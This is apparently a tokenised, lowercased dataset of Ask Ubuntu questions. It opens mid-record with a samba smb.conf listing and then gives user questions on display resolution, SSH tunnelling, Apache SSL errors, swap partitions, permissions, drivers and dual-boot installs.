'/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & domain master specifies samba to be the domain master browser . if this machine will be configured as a bdc ( a secondary logon server ) , you must set this to 'no ' ; otherwise , the default behavior is recommended . domain master = auto some defaults for winbind ( make sure you 're not using the ranges for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash the following was the default behaviour in sarge , but samba upstream reverted the default because it might induce performance issues in large organizations . see debian bug # 368251 for some of the consequences of not having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes setup usershare options to enable non-root users to share folders with the net usershare command . maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 allow users who 've been granted usershare privileges to create public shares , not just authenticated ones usershare allow guests = yes ; guest ok = no ; guest account = nobody ======================= share definitions ======================= un-comment the following ( and tweak the other settings below to suit ) to enable the default home directory shares . this will share each user 's home director as \server\username [ homes ] comment = home directories browseable = no writable = yes by default , the home directories are exported read-only . change the next parameter to 'no ' if you want to be able to write to them . file creation mask is set to 0700 for security reasons . if you want to create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 directory creation mask is set to 0700 for security reasons . if you want to create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 by default , \server\username shares can be connected to by anyone with access to the samba server . un-comment the following parameter to make sure that only `` username '' can connect to \server\username the following parameter makes sure that only `` username '' can connect # this might need tweaking when using external authentication schemes ; valid users = % s un-comment the following and create the netlogon directory for domain logons ( you need to configure samba to act as a domain controller too . ) [ netlogon ] comment = network logon service path = /home/samba/netlogon guest ok = yes ; read only = yes un-comment the following and create the profiles directory to store users profiles ( see the `` logon path '' option above ) ( you need to configure samba to act as a domain controller too . ) the path below should be writable by all users so that their profile directory may be created the first time they log on [ profiles ] comment = users profiles path = /home/samba/profiles ; guest ok = no browseable = no create mask = 0600 directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes ; guest ok = no ; read only = yes create mask = 0700 windows clients look for this share name as a source of downloadable printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers ; browseable = yes ; read only = yes ; guest ok = no uncomment to allow remote administration of windows print drivers . you may need to replace 'lpadmin ' with the name of the group your admin users are members of . please note that you also need to set appropriate unix permissions to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes the next two parameters show how to auto-mount a cd-rom when the cdrom share is accesed . for this to work /etc/fstab must contain an entry like this : # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # the cd-rom gets unmounted automatically after the connection to the # if you do n't want to use auto-mounting/unmounting make sure the cd is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom [ new scan ] path = /mnt/scan/new scan browseable = yes read only = no [ share ] path = /mnt/sda2/share browseable = yes read only = no [ format ] path = /mnt/sda2/format browseable = yes read only = no [ books ] path = /mnt/sda2/books browseable = yes read only = no
408181	ubuntu 12.04 suddenly does n't recognize my 2nd monitor	because the screen of my laptop is broken , i work with an external monitor , which should be able to display 1920x1020 ( or something ) . this always worked , till this morning . suddenly the screen is stretched and i can only select 1024x768 ( 3:4 ) . rebooting does n't work ( n00b 's 1st solution to everything ) , so i do not know how or what . your help is much appreciated !
408190	how to ssh tunnel to ec2 for running a local python script	i can create a tunnel for ff using the below on ubuntu . machine is 12.04 in a vbox on a mac host . -i ~/.ec2/aws_development_oregon.pem -c2qtnn -d 8080 ubuntu @ test.com but..what i need is for my my python scripts to tunnel though . how do i have all traffic on the vbox tunnel though the ec2 instance or at least have the python 2.7 script use the tunnel ? i looked into sshuttle but i dont understand how to use it . thanks
408191	how to enable pci bridge for wol ?	in order to make sure that the pci bridge is ready for wol , i tried placing echo enabled /sys/class/pci_bus/0000:00/device/0000:00:1c.0/power/wakeup in /etc/rc.local appearantly , these folders do no exist ( yet ? ) at the time rc.local is called , because i got an error that the folder could not be found . if i copy/paste the instruction to the terminal window , the system returns no error . i assume this is some sort of timing issue , does anybody know how to do this correctly ? or if somebody can show me a reference where to find more info on how the folder structure is built for /sys/class , that might help too !
408200	apache2 giving sslcertificatefile error	i am using ubuntu 13.04 . initially i had installed apache2 and it was working fine but later it started giving some issues so i removed apache using following commands sudo apt-get autoremove sudo apt-get remove apache2* dpkg -s which apache2 and then i reinstalled apache2 using sudo apt-get install apache2 installation was almost done but then i got following message starting web server apache2 syntax error on line 6 of /etc/apache2/sites-enabled/ssl : sslcertificatefile : file '/etc/apache2/ssl/apache.pem ' does not exist or is empty action 'start ' failed . the apache error log may have more information . [ fail ] invoke-rc.d : initscript apache2 , action `` start '' failed . setting up apache2 ( 2.2.22-6ubuntu5.1 ) ... output to ls /etc/apache2/sites-enabled/ is default-ssl mysite ssl content of mysite is serveradmin webmaster @ localhost documentroot /home/gautam/apache/ < directory / > options followsymlinks allowoverride none < /directory > < directory /home/gautam/apache/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined after running sudo rm /etc/apache2/sites-enabled/*ssl i am getting the following output and apache2 is off * restarting web server apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername ( 98 ) address already in use : make_sock : could not bind to address [ : : ] :443 [ ok ] what to do ? any suggestions ? ? ?
408203	can i install ubuntu on ativ book 4	my laptop is samsung ativ book 4 np450r4v-xo2 , can i install ubuntu on my laptop dual boot with windows 7 , if can , please give me information for install that ?
408204	ubuntu 12.04 lts skype issue	hi there : ) i 'm new to ubuntu and trying to figure out how it works : d i 've installed skype but i 'm having issues with audio playback , microphone . can please anyone help me ? thanks giuseppe .
408208	notifi-osd how can i modify the notifications at the user-select screen ?	when i start up the computer it automatically connects to the wifi so it displays a notification at the `` user-select-screen '' ( does it have a name ? ) . it 's displayed in the default style of notify-osd when first installing it . you know ; the black rectangular box . no fading , no transparency , no effects , nothing . how do i modify it ? p.s ; i 'm not sure if the tag `` user-space '' is correct
408210	total confusion about ubuntu !	ok , here 's the story . i installed ubuntu a couple of days ago ( alongside windows 7 ) , i have a 128 gb ssd , a 1tb hdd and a 500gb external hdd . i accidentally installed ubuntu onto the external hdd . i did n't feel like this should matter , i had plenty of space and the files on my externall hdd were n't extremely important . the installation went fine , the next time i booted it came up with a 'no such device ' error which i fixed by re-installing grub via an ubuntu cd . the problem is everytime i boot my pc , i must go into my boot menu ( asrock motherboard ) and select to boot from my external hdd , grub then pops up and gives me the option of booting windows or ubuntu . if i do n't go into the boot menu , my pc displays nothing on the screen . i ca n't set my boot priority to the external hdd ( for whatever reason ) so i am struggling to see a fix for this . my question is ! how can i set my pc to boot either : grub ( boot from the external hdd ) or windows 7 ( being my preferred operating system [ at the moment ] , so i then i have the option to manually do what i 'm currently doing to boot ubuntu when i want to use it ) p.s i will happily give you any information you want so long as you guide me a little ! thanks in advance , fletcher .
408212	3 swap partitions and only one in use	if i go to settings - disks ( xubuntu ) i see 3 swap partitions ( 2.1 , 2.5 and 6.2 gb ) but only one is in use , the 2.1 , the smaller one , the others are wasted space . i can activate the other two partitions , but if i restart the other two partitions are deactivated . how can i make these partitions to be activated at start , or better , to unify this partitions to have only one . thank you the result of : sudo fdisk -l : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009b081 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 122880676 61336914+ 7 hpfs/ntfs/exfat /dev/sda3 122882048 495726362 186422157+ 7 hpfs/ntfs/exfat /dev/sda4 495726590 625141759 64707585 5 extended /dev/sda5 613066752 625141759 6037504 82 linux swap / solaris /dev/sda6 608186368 613056511 2435072 82 linux swap / solaris /dev/sda7 495726592 603994111 54133760 83 linux /dev/sda8 603996160 608172031 2087936 82 linux swap / solaris partition table entries are not in disk order
408221	ubuntu 13.10 vs 14.04 for a lenovo yoga 2 pro laptop ?	i just picked up a lenovo yoga 2 pro laptop today and want to install ubuntu on it . i intend to dual boot for the moment with windows 8.1 and will try to maintain the secure boot setup . as some of you probably already know the laptop is cutting edge with features such as a 3200 x 1800 screen resolution , backlit screen and touchscreen , and a `` laptop to tablet folding behavior '' which has created an endless number of issues for early adopters wishing to install ubuntu or other linux distros on it . i normally never install alpha software on a machine but was thinking about it on this machine since the newer kernel and modules may allow better handling of cutting edge hardware . i realize that i will be installing alpha software and will avoid doing any mission critical work on the machine . i will also maintain a separate home partition in case i need to downgrade the install or rescue user data . so 14.04 or 13.10 for this machine ?
408222	no vga/vgaswitcheroo in /sys/kernel/debug ( ubuntu 13.10 )	i am aware of some of the other threads on this problem , but i have tried the options found in those without success : sudo su cat /sys/kernel/debug/vgaswitcheroo/switch gives cat : /sys/kernel/debug/vgaswitcheroo/switch : no such file or directory could it be because my xorg.conf is only setting up the intel device ? the /sys/kernel/debug appears to be mounted , and i do n't have any quirky boot options : cat /proc/cmdline boot_image=/boot/vmlinuz-3.11.0-15-generic.efi.signed root=uuid=8a15962e- ad4d-4eb0-96af-37d167313e92 ro quiet splash vt.handoff=7 for modeset i have : cat /sys/module/i915/parameters/modeset -1 not quite sure if that is a problem or not ? but i 've also tried booting with the i915.modeset=1 radeon.modeset=1 options , and verified the modeset is indeed 1 . i also checked mount | grep /sys/kernel/debug showed none on /sys/kernel/debug type debugfs ( rw ) so this is mounted correctly . lshw -c display shows : *-display description : vga compatible controller product : haswell-ult integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:60 memory : f0000000-f03fffff memory : e0000000-efffffff ioport:5000 ( size=64 ) *-display description : display controller product : sun xt [ radeon hd 8670a/8670m/8690m ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:06:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:65 memory : d0000000-dfffffff memory : f0400000-f043ffff ioport:3000 ( size=256 ) memory : f0440000-f045ffff my kernel seems to be compiled with the proper options : grep -i switcheroo /boot/config-* /boot/config-3.11.0-12-generic : config_vga_switcheroo=y /boot/config-3.11.0-15-generic : config_vga_switcheroo=y so why would vgaswitcheroo be missing ?
408224	the file casper/filesystem.squashfs is corrupt	i tried burning lubuntu 12.04 to a cd-rw with xfburn and braseo , but it keeps be corrupted . i tried to check my hashes but : lubuntu 12.04 i386 $ md5sum -c md5sum.txt | grep -v `` ok $ '' md5sum : ./casper/filesystem.squashfs : input/output error ./casper/filesystem.squashfs : failed open or read md5sum : warning : 1 listed file could not be read my disc has enough room . also , the iso 's checksum is fine . ~/desktop $ md5sum -c md5sums.txt md5sum : lubuntu-12.04-alternate-amd64+mac.iso : no such file or directory lubuntu-12.04-alternate-amd64+mac.iso : failed open or read md5sum : lubuntu-12.04-alternate-amd64.iso : no such file or directory lubuntu-12.04-alternate-amd64.iso : failed open or read md5sum : lubuntu-12.04-alternate-i386.iso : no such file or directory lubuntu-12.04-alternate-i386.iso : failed open or read md5sum : lubuntu-12.04-alternate-powerpc.iso : no such file or directory lubuntu-12.04-alternate-powerpc.iso : failed open or read md5sum : lubuntu-12.04-desktop-amd64+mac.iso : no such file or directory lubuntu-12.04-desktop-amd64+mac.iso : failed open or read md5sum : lubuntu-12.04-desktop-amd64.iso : no such file or directory lubuntu-12.04-desktop-amd64.iso : failed open or read lubuntu-12.04-desktop-i386.iso : ok < -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- this is the file md5sum : lubuntu-12.04-desktop-powerpc.iso : no such file or directory lubuntu-12.04-desktop-powerpc.iso : failed open or read md5sum : warning : 7 listed files could not be read what is going on ?
408225	fan is always running ubuntu 13.10	i have recently dual-booted my pc with windows 7 and ubuntu 13.04 . i also recently upgraded to 13.10 . the problem did n't change , so that is irrelevant except to the fix i suppose . while looking around , i found psensor and decided to check my stats.i have linked to a screenshot displaying the results , since i ca n't post a picture . http : //imgur.com/ygbkctz you can see that the fan speed has a minimum of over 850 rpm . it is my understanding that psensor displays the minimum and maximum values that have occurred since the program was opened . herein lies the problem . the fan does not stop or slow down . ever . let me know if you need any more info or if i need to run any tests that would help . i 'm willing to try whatever . thanks !
408226	what does -1 mean for modeset ? what are other options for modeset ?	i have a rough idea what kms setting is : kernel mode-setting ( kms ) shifts responsibility for selecting and setting up the graphics mode from x.org to the kernel . when x.org is started , it then detects and uses the mode without any further mode changes . this promises to make booting faster , more graphical , and less flickery . and i gather that nomodeset turns this off ( i have not selected that ) , presumably shifting responsibility back to the graphics card module ? when i do cat /sys/module/i915/parameters/modeset i get -1 , what does that mean exactly ? examing modinfo i915 | grep modeset parm : modeset : use kernel modesetting [ kms ] ( 0=drm_i915_kms from .config , 1=on , -1=force vga console preference [ default ] ) ( int ) so looks like it means `` force vga console preference '' , whatever that means ...
408231	lenovo thinkpad e335 and ubuntu 12.04 : black screen after wake up from standby	i installed ubuntu 12.04 on my new thinkpad e335 . unfortunately i get a black screen after waking my notebook up from standby . thanks for any help simon
408232	undetected pendrive i want to format	i run the command lsusb and it shows my pendrive is attached at a bus . but my pendrive is not shown at disk utility to format
408237	3g dongle contecting issue - the handle is invalid	please help i have purchase new mts mblase 3g dongle ( huawei - ec306 dongle ) & connected to my dell laptop . i am getting the error # 06 or the handle is invalid . please help me to resolve this . regards , naveen kotriya
408240	ubuntu taking forever to boot	hi well this started happened after i only installed ubuntu for few days less than a week on my new pc : ) well i only go to windows 8 that i chosed alongside for downloading ! i just went yesterday to show my friend battlefield 4 ! windows was so slow i mean no lag bu long loading times after that i restarted and went ubuntu it was also slow for first but i did anyway did some usual stuff turned off night i turned on windows and put internet download manager on schedule download and auto turn off now i chose ubuntu it just goes dots ... . when i press almost any keys it goes to black screen and i got this few fail on some stuff and this is where it always stuck : `` stopping startpar bridge for notification of upstart job start/stop '' also now im using flash and try ubuntu ! i read many forums but non was like mine sorry if there is ! ! damn it my day is already wasted on this : ( ( ( ( ( ( edit : ctrl + alt + f4 works i first tell my username and teh password and test like sudo apt-get install gcc* and it shows the list ! ! ! also if matters the option alongside win8 was grey at first i did this : chkdsk /f and it was available after and installed finaly ! now reinstall ubuntu is grey ! ! ! i tryed doing again ! but this time it was also diffrent and required 2 restarts
408242	problems running java websites	i 'm having problems with openjdk7 and icedtea7 . in one computer , which works with ubuntu 13.10 , i have installed openjdk7 and icedtea7 . in the other computer , which works with ubuntu 12.04 and is an imac7.1 , i have installed exactly the same but 64-bits version . i think java works in both cases because if i try to test them in http : //bubblemark.com/ they work nicely but when i try to play chess in buho21.com/salas/ajedrez.jsp the imac does not work . i have tried a lot of things ( install oracle-java-7-installer , openjdk-6 , icedtea6 , reinstall everything again ) and i know this question is asked previously but the answers did n't work for me . has anyone experienced the same issue and can help me ? thanks .
408243	getting back unity login screen after experimenting with xfce and gnome .	i recently installed and then uninstalled , via the software centre , xfce4 and kde plasma desktop environments . however , i 've been left with a login screen from what i guess was the xfce installation . anyway , i 'd like to get back the good old 13.10 unity login screen where i can shift between environments using the gear . how should i go about it ?
408246	i do n't have any buttons on my menu bar	i was typing random words at terminals and later i found out that there are no menu buttons on my menu bar . what can i do to get them back ?
408247	installing tata photon plus dialer-ubuntu 13.10	i am using ubuntu-13.10 . i bought a new tata photon plus prepaid connection ( ec-156 modem ) . i installed the dialer in my windows desktop pc and it went fine . i tried to install the dialer software in my laptop with ubuntu . i saw the manual and i was told that after inserting the modem to the system i can find the device in /media . but even after waiting for long time i could n't see the files in that folder . only if i can go to that location i can install the dialer software as said by the manual . but i can use the modem to connect to internet from the networks menu available at the top . what is the problem ? why i could n't install the dialer ? output of lsblk : thanks in advance .
408248	installation choices	i use macbook pro with intel core 2 duo processor and 4gb ram - 64-bit capability unless i am wrong . your 64-bit downloads for 12.04.3 and 13.10 stipulate amd by name , your 32-bit downloads stipulate intel ( i386 ) by name . is there a choice for intel 64-bit ? thanks
408249	permission denied	some folders and files under my folder named movies cant be deleted i had a look and there is no longer a user even set on them to remove or edit them . some how it has removed it self as me being the creator of them i was listed as being about to last time i checked . i ca n't simply delete the folder by cli as i have files in there i need still but i need to delete the folders that are in there . i could transfer the files out and then delete it but that would take to long to transfer them and i need to delete the existing folders now to free up space . so my question is how can i delete multiply folders without an assigned user creator or any as none is listed anymore ? my user account wo n't let me change the permission because for some reason my username was removed from the folders and files so i cant even chmod them from the gui as there is no assigned username listed in the permissions tab even tho i am the creator .
408250	chmod folder + subfolder + subfolder etc	i 've been overlooking this problem for several hours and i 'm starting to get crazy . i have a few folders sharing with users . when setting up the permissions the folders are being displayed ok , but ca n't acces the subfolders ( or see the content ) . what i 've been trying : chmod -r 770 test as i said , i can acces the content of the folder test , but ca n't acces test > test 1 > test 2 > . how do i apply these settings to all enclosed folders and files ? kind regards , [ edit ] when doing chmod -r 770 test i get the following output : drwxrwx -- - 3 server server 4069 jan 20 17:25 test1
408251	low screen resolution after installing bumblebee	i installed bumblebee and on reboot , i had lost the screen resolution i had before . i have tried uninstalling bumblebee and also deleted the xorg.conf file but i am still stuck with the low resolution . i have looked at many pages with this problem but none have worked for me so far . can anyone help with getting back the native resolution ?
408252	i can not login following updates	following updates and a reboot i would attempt to login to lubuntu and the login dialogue would disappear as usual but that would be it . no task bar , no right click menu or icons . i have tried the following : ctrl + alt + f1 sudo apt-get install lubuntu-desktop sudo mv -v .xauthority .xauthoritybak sudo shutdown now -r now when i attempt to login i get a black screen for a few seconds and then i am returned to the login prompt . any help would be great as i would really like to recover my address book and calender from thunderbird
408259	upgrading every six months does need in general to be that careful ?	i have a very basical question to ask on the everyday use of the ubuntu system . i plan to migrate from a version* to another , but before that i would like to be sure if it is possible to save what has been set and that so that works properly , before doing so . putting the question in an another way aroundâ : it is necessary to wonder about those points when upgrading or it is just necessary as an backup in case of an upgraded system thas has gone wrong ? thanks in advance . *12.10 qq > > 13.04 rr
408260	can i control the position of a console window on the screen ?	i want my c/c++ program 's console window to chose a specific position . is it possible either within the program or by system call ?
408261	new hardrive for broken laptop , now like to install ubuntu . how ?	i have broken the hard drive in my acer laptop , so need to reinstall . i will get a new one , but how can i install ubuntu ? i have a usb with netboot on it , but how can i get it to work in the bios settings , and boot from it ?
408266	what gpu driver to use for 4870x2 , ubuntu 13.10	i have a 4870x2 gpu and was wandering what driver i should use . as far as i understand the official legecy driver from amd wont work with ubuntu 13.10 because of the new x version ? right now it states gallium 0.4 from the about computer ui . i have ( maybe ) messed up something when i tried to install some new mesa drivers ( v9.3 i think ) , and i have tried to install a patched version of fglrx i think . however , nothing seems to have changed since the freshly installed ubuntu 13.10 . i tried to play a little dota 2 and got some artifacts , and maybe a little low performance . so what driver should i use and how would i install it ? i may also need to activate the second core of my gpu manually ? thanks !
408267	how to define clone presets to virt-manager	when using virt-manager 0.9.1 to clone existing machines , it ignores that the virtual disks are qcow2 compressed and sparsed . the cloned virtual disks are non-sparsed and in raw format . i know about the virt-clone command , but would prefer to use virt-manager . is it possible to preset virt-manager to either respect the original virtual disk formats or to conform to my personal needs ?
408274	system freeze when under moderate network activity - 12.04 arm system	i have an arm system that runs ubuntu 12.04 , more specifically the kayla development kit from seco . my problem is that the system freezes when i send ethernet data to the system in the amount > 60 mb/s . now , the system has a 1gbit/s nic , so the amount should not be a problem at all . the data is sent as 1kb packets at a frequency that gives the desired bit-rate . wireshark has been used to verify that the outgoing traffic is evenly spaced in time and of the desired size and rate . i do n't need programs open , and when i stop the data traffic , the system recovers just fine . sometimes ... . sometimes ... the system can handle higher data amounts ; especially if it has been `` warmed up '' . anyone has an idea to what is going on ? thanks in advance henrik
408277	cant resize partition with gparted due to failed btrfsck ?	i cant resize my home partition with gparted . here is the output that causes gparted to fail http : //pastebin.com/axwctaek
408278	my bios will not recegnise ubuntu as a valid os now	i downloaded the iso and burned it to a dvd . restarted the laptop and the bios tells me that ubuntu is now an invalid os . is there some special thing you have to do to get it to boot now ? i have had ubuntu on other thinkpads before .
408279	cinelerra-cv effect and transitions question	just install cinelerra but there 's not really to many effects or transitions is there a way to install more effects and transitions ? i like the way it works so far id like to continue using it
408280	fspps/2 sentelic fingersensing pad incorrectly detected as mouse ?	just installed 12.04.3 desktop and am having trouble getting this laptop 's touchpad to work correctly . at the moment , the two main problems are as follows : because the system is picking it up as a mouse , i ca n't access the touchpad options . the motion of the touchpad is extremely jittery , even 'jumping ' off to the left occasionally . as such , this is rendering the touchpad unusable . xinput is detecting it as `` fspps/2 sentelic fingersensing pad '' with id of 12 . the laptop is a hi-grade w651di , one of those generic rebrand models . i have tried installing the linux driver from http : //sourceforge.net/projects/fsp-lnxdrv/ but it does nothing for the jitteriness of the touchpad , nor does it make the touchpad tab appear in the system settings . a solution to the jitteriness on a similar touchpad was suggested at https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-input-synaptics/+bug/992330 but i 'm unable to work out how to change the hysteresis setting with the touchpad i have , and i do n't really know enough about linux to adapt the suggestions to my hardware . i could live without the touchpad options in system settings , but the current jitteriness of the touchpad is making it unusable ( i 'm using a usb mouse until it 's sorted ) , so i 'm really looking for a way of changing the hysteresis setting with the touchpad on this laptop .
408284	broadcom bcm4312 on ubuntu 12.04	new to ubuntu on a dell computer . ubuntu 12.04 does n't see my wireless card ( broadcom bcm4312 ) at all , the wireless light doesnt light . the driver is listed under `` additional drivers '' , but fails when i attempt to install . i have tried responses to other questions , no results . just learning-not yet an expert with coding .
408287	13.10 - blank terminal prompt ( no working directory displayed )	upon opening a new terminal window , i 'm getting a blank prompt with a flashing cursor . new terminal window / blank promp ( image ) this just started happening the last couple days and i ca n't seem to find a solution . prior to this , i modified .bashrc to shorten the working directory . i also included some rvm scripts for configuring a rails environment . # 01/15/14 # hide working directory on prompt export ps1= '' \w : `` # rvm scripts path= $ path : $ home/.rvm/bin # add rvm to path for scripting [ [ -s `` $ home/.profile '' ] ] & & source `` $ home/.profile '' [ [ -s `` $ home/.rvm/scripts/rvm '' ] ] & & source `` $ home/.rvm/scripts/rvm i can get a working prompt by entering ctrl+c , however , this then ignores the .bashrc snippet for shortening the working directory . working prompt ( image ) rebooting does not solve this .
408298	problem switching between shift and super key	since my shift key in my keyboard is not functioning properly i wanted to permenantly switch between shift and super key . i 've succeeded doing that by using xmodmap command which runs this script : ! ! swap mod4 and shift modifiers ! clear shift clear mod4 keysym shift_l = super_l keysym super_l = shift_l keysym shift_r = super_r keysym super_r = shift_r add shift = shift_l add shift = shift_r add mod4 = super_l add mod4 = super_r the problem is that i have hebrew layout in my keyboard and when i set 'keys to change layout ' to alt+shift , the shift and super keys are switched back to the original state i.e . shift key becomes shift key and super key becomes super key why does this happen ? thanks very much niv jokop
408299	trouble with reinstalling ubuntu on lemur ultra , installation seems to work properly but computer does n't work upon reboot	i have reinstalled ubuntu using a flash drive on my computer . the only thing that seems to run into an error upon reinstallation is that an app has an error . when i take out the flash drive and restart the computer asks me if i want to use ubuntu , advanced options , or two memory tests . i choose ubuntu and then the computer shows a bunch of codes and such . i 'm newer to ubuntu so i 'm not sure what any of it means . is there a command i need ? please i need help pronto and i 've tried all that i know how to do .
408300	need a shell script to loop launching a connection to a thin client , waiting , logging off , then connecting to a windows 7vm	i 'm very new to ubuntu and i need to have a shell script to do what the title says . i used : xfreerdp -u [ uname ] -p [ password ] -o -- plugin drdynvc -- data rdpeusb -g 1280x1024 -- [ vm 's ip ] to make sure i can make the connection to vm , but subbing in the ip of the thin client didnt work . im not sure if outright asking for that is bad etiquette so if anyone as some recommended reading as to learning how to go about this . google keeps throwing me 3rd party programs used to launch connections to vms so its not hat helpful .
408301	ip address on virtual bridge ?	i would like to configure a static ip address on the virtual machine . this interface should be connected to one of the host physical interfaces via a bridge . if i have understood the documentation correct , the physical interface attached to the bridge has no ip address . only the interface in the vm has to be configured with an ip address and must be on the same subnet like the default router which is a physical router connected behind a layer 2 infrastructure . all the configuration examples shows an ip address configured on a virtual bridge . why ?
408302	rotated monitor . login screen needs rotation	i rotated my screen , an once i login , it works fine . but , the greeter ( login ) screen has n't got the message that things are rotated 90 degrees . how can i change the rotation of the login screen ? update : lock screen is in correct position . i only see this when i boot , or log out .
408304	nautilus error after upgrading from 12.10 to 13.04	the desktop icons were missing . i installed the compizconfig-settings manager to restore the icons . i followed this steps : press ctrl+alt+t to open a terminal window . at the terminal prompt , type ccsm . type sudo apt-get install compizconfig-settings-manager . at the next terminal prompt , type ccsm . in compizconfig settings manager , select the check box for the opengl plugin if it is n't already selected . click the ubuntu unity plugin item . select the enable ubuntu unity plugin check box , if it is n't already selected . if it is already selected then uncheck this and again select it . exit from the compizconfig settings manager . the icons are displayed again . now i need to resolve another issue . when i try to open nautilus ( when enter code : gksu nautilus ) i got the following message : ( nautilus:13161 ) : glib-gobject-warning ** : invalid cast from `gtkmessagedialog ' to `nautiluswindow' ** error : nautilus-window.c:1826 : nautilus_window_get_slots : assertion failed : ( nautilus_is_window ( window ) )
408305	how to accurately adjust kde plasma panel height ?	i can just drag it . but when i drag it i do n't know the height of it in pixels . how could i adjust it accurately so that i know the height ?
408306	is there a way to read osx .numbers files ?	a friend has given me a spreadsheet generated by mac osx `` numbers '' and before i ask her to resend it , i 'm wondering if there 's secretly a way that i can just read this in ubuntu . is there maybe a plugin for libreoffice ? just googling is n't turning up much -- `` numbers '' kind of gets lost in the noise .
408312	lubuntu 12.04 & steam	i have a very old laptop ( pentium m 1800 inside : d ) , and installed lubuntu on it . because of problems with the pae kernel , i used lubuntu 12.04 alternate install as described here . this worked out pretty well , so after that i installed ubuntu-desktop and had the glorious idea of installing steam on it as well . i used the steam package provided by ubuntu software center . right now after the installation , steam did update and start . although it was full of graphic errors like missing buttons and a white background where steam usually is all black , i could even install a game . ( no , i do not want to play counterstrike on this ... ) , only one or another small-time killer games every so often ) but after a restart , steam now does not start anymore . starting it via lxterm gets the following output : steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1363394289_client ) -- - and then nothing happens . if this is an error message , i fail to see which error it describes . i am totally new to ubuntu ( and linux on the whole ) , so if you have any idea on how to solve this i 'd be really glad . if not ... well.. i 'll get rid of steam and install mame instead = ) might fit better for this old piece of hardware : )
408313	script to write all filenames inside a folder and its subfolders to a csv file	i would like to write a shell script in order to write all files ending with .tif in a given directory and all its subdirectories to a csv file . the directory contains various sub-directories and those can also contain .zip folders so the script should be able to extract the names from zip folders too . i first thought about separating these steps though ( unzipping and getting the filenames ) but i 'm not sure if this is really necessary . since i 'm really new to working with the shell , any help would be appreciated .
408314	how do you permanently disable the laptop screen ?	i 've setup my laptop on my tv via hdmi and have xbmc installed as a media center . the laptop is closed next to my entertainment unit , and i control it using a wireless keyboard . i noticed that on the odd occasion when i open the lid , i see the same stuff on the laptop screen that i see on my tv screen ... meaning xbmc is rendering both screens at once . now , my laptop is n't the most powerful in the world , and i like squeezing every bit of juice out of it that i can ... seeing that the display is being rendered on 2 different displays , is this taking up additional system resources that could be better used elsewhere ? i 'd really like to know if there 's any way to disable the laptop screen altogether , and only use the hdmi port . i know this can be done directly in the ubuntu display properties , where you can chose to turn a particular display on or off . however , it still seems to be active when running solely in an xbmc session .
408317	how do i correctly partition for a dual-boot 12.04 install ?	i tried to partition and install ubuntu 12.04 a week ago and got very far . i shrunk my windows partition and formatted it for a fresh ubuntu install to dual-boot alongside win7 . i got so far as the partition screen in ubuntu and had no idea what i was doing at that point . i screwed around a bit and almost got through the installation until i received this error : the title of the message was : unable to install grub to /dev/dm-1 and the contents of the message were : executing 'grub-install /dev/dm-1 ' failed . this is a fatal error . i ca n't afford to screw up my windows as i do n't have another computer and have virtually no time to fix the mistakes except on the weekends . i know that there are a ton of posts on this but unfortunately , i have no idea what `` swap partitions '' or anything are . i 'm literally brand new but do n't want to start over from scratch . is there any way i can do this safely without harming my existing windows partition ? when i boot from the usb installer i created it does n't give me the option to install alongside . is this because i am not using the .iso and booting from that ? if i could avoid the manual partitioning and let ubuntu do it , i would gladly do so .
408320	i just downloaded ubuntu 13.10 for the first time . upon being prompted to enter passphrase , nothing shows up in the text box !	i am brand new to linux and decided to install ubuntu 13.10 to my older desktop computer ( compaq presario c2400wx i believe ) . everything was running quite well until after i booted up . we got the usual crypstep message and were prompted to enter a passphrase , however , no source of input will make text appear in the box to enter text in . my keyboard works just fine . upon looking at other posts with similar problems , it was suggested to use a ps/2 keyboard , which we do not own , so that would need to be obtained . it was also suggested to insert the keyboard to a usb3 port , of which my computer has none . is there anything we can do without buying another keyboard , or are we just going to need to wait ? this has all been very frustrating as the computer is essentially a paperweight at the moment . any suggestions please ?
408321	cant install ubuntu 13.10 on lenovo z475 ( secure boot error )	i am trying to install ubuntu 13.10 on my lenovo z475 laptop , but when i boot from the cd , a secureboot error message appears , then the screen freezes on the grub menu . i have seen many other people also get this error , and apparently a solution would be to disable the secure boot option from the bios setup , yet in my bios i dont find any option relating to secure boot or uefi . i have windows 7 ( not windows 8 , and when i search how to disable secure boot , everything relates to windows 8 ) . also , i recently just installed ubuntu on my other laptop , so i am a linux noob . thanks !
